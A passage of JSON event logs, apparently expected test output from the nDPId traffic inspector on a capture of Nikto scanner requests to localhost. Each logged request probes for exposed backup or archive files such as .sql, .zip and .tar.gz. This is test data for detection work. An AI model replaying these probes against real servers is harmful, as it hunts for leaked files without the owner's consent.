{"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":1,"flow_last_seen":1576420277255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277255,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/zTlAAEAGbv1\/AAABfwAAAcRmH5BLoPWWHSfpPoAYAED+swAAAQEICp1m\/S+dZv0vR0VUIC8xMjcuZWdnIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":1576420277258,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277258,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/W9xAAEAG4Fp\/AAABfwAAAcRoH5D01mN5gVzP14AYAED+swAAAQEICp1m\/TKdZv0yR0VUIC8xMjcuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":1576420277260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277260,"pkt":"AAAAAAAAAAAAAAAACABFAADF4tJAAEAGWV5\/AAABfwAAAcRqH5C3Btp0g+NrSIAYAED+uQAAAQEICp1m\/TSdZv00R0VUIC8xMjdfMF8wXzEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":1576420277261,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277261,"pkt":"AAAAAAAAAAAAAAAACABFAADFGk1AAEAGIeR\/AAABfwAAAcRsH5AZ8SLp80IPEIAYAED+uQAAAQEICp1m\/TWdZv01R0VUIC8xMjdfMF8wXzEuemlwIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":1,"flow_last_seen":1576420277263,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277263,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/qndAAEAGkb9\/AAABfwAAAcRuH5AQK5LXaKY1oYAYAED+swAAAQEICp1m\/TadZv02R0VUIC8xMjcuc3FsIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":1,"flow_last_seen":1576420277264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277264,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/DxVAAEAGLSJ\/AAABfwAAAcRwH5D+vze4KlHK9oAYAED+swAAAQEICp1m\/TidZv04R0VUIC8xMjcuc3FsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":1576420277266,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277266,"pkt":"AAAAAAAAAAAAAAAACABFAADKoqhAAEAGmYN\/AAABfwAAAcRyH5D4dpoDoX2CwIAYAED+vgAAAQEICp1m\/TqdZv06R0VUIC8xMjdfMF8wXzEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":1576420277268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277268,"pkt":"AAAAAAAAAAAAAAAACABFAADKWilAAEAG4gJ\/AAABfwAAAcR0H5DTe2KDABhOQYAYAED+vgAAAQEICp1m\/TydZv08R0VUIC8xMjdfMF8wXzEudGFyLmx6bWEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":1,"flow_last_seen":1576420277269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277269,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/XglAAEAG3i1\/AAABfwAAAcR2H5D4uGaj1sX5qYAYAED+swAAAQEICp1m\/T2dZv09R0VUIC8xMjcuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":1,"flow_last_seen":1576420277270,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277270,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/A5hAAEAGOJ9\/AAABfwAAAcR4H5CBQjs0aZw5xIAYAED+swAAAQEICp1m\/T6dZv0+R0VUIC8xMjcuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":1,"flow_last_seen":1576420277272,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277272,"pkt":"AAAAAAAAAAAAAAAACABFAADA729AAEAGTMZ\/AAABfwAAAcR6H5Cm4tfMZrHSAYAYAED+tAAAAQEICp1m\/UCdZv1AR0VUIC8xLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 